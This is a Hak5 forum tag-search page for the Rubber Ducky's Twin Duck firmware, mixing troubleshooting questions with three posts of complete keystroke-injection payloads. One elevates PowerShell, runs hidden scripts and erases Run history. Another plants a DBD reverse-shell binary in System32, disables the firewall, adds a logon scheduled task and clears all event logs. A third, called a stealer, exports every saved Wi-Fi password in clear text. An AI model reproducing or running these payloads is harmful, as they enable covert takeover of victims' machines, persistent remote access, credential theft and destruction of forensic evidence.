Jump to content

Search the Community

Showing results for tags 'twin duck'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 7 results

  1. Hello I recently purchased a USB Rubber Ducky and I soon flashed it with twin duck. I then a script on the SD card and plug it in to test the payload. The ducky is just flashing from Green to red countinously. A little help would be great. Thank you, Cassetti
  2. Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?
  3. For some reason after I flash the ducky with the twin duck hex it flashes red and green but when i flash it with the normal hex its completely fine.
  4. Hello all, I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from Github and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly. DELAY 2000 GUI d DELAY 100 GUI r DELAY 500 STRING powershell -Command "Start-Process cmd -Verb RunAs" ENTER DELAY 1000 ALT y DELAY 800 STRING mkdir C:\Windows\ProgData ENTER STRING attrib +h C:\Windows\ProgData ENTER STRING powershell ENTER DELAY 800 STRING Set-ExecutionPolicy Unrestricted ENTER STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')" ENTER DELAY 2000 STRING cd $Env:WinDir\ProgData ENTER STRING .\seq1.ps1 ENTER DELAY 1000 STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat ENTER STRING exit ENTER STRING exit ENTER DELAY 500 GUI r DELAY 500 STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER
  5. Hi All, Has anyone though to try and get Twin Duck working on a Raspberry Pi Zero? From what I understand, you can only use one of the RPi 'modules' at once, so you can use g_ether, or g_HID, or g_mass_storage, but not more than one. Which is problematic, since you'd need the HID and Mass Storage modules active to make this work. Any thoughts? OBL
  6. First Post, here it goes I love the idea of the simple-ducky payload generator, I however do not love the idea of using powershell to download the dbd reverse shell from a webserver, its sloppy and unpredictable. Solution - Copy and launch DBD from twin duck flashed ducky! First you will need to create your dbd executable. Now navigate to /var/www/ on your linux box and rename winmgnt.txt to winmgnt.exe, copy this to the root of your ducky sd card. Now for the script I have included 2 scripts, one for a box with admin rights, the other for standard user rights. REM *** DBD no downloading with powershell - ADMIN Access *** REM *** CMD with UAC Bypass *** DELAY 10000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER REM *** DBD no downloading with powershell - Standard User Access *** REM *** CMD *** DELAY 10000 WINDOWS r DELAY 200 STRING cmd.exe ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER Hope you enjoy these scripts, if anything is wrong with them please let me know so i can fix them locally. NOTE - The Volume label of the sd card should be "DBD" to work with the script, but if you know what your doing change that to whatever you want.
  7. This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky. Requirement: This one is to be used with Twin Duck firmware. DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d DELAY 500 ENTER DELAY 300 STRING netsh wlan export profile folder=%myd%\ key=clear ENTER DELAY 500 STRING exit ENTER
×
×
  • Create New...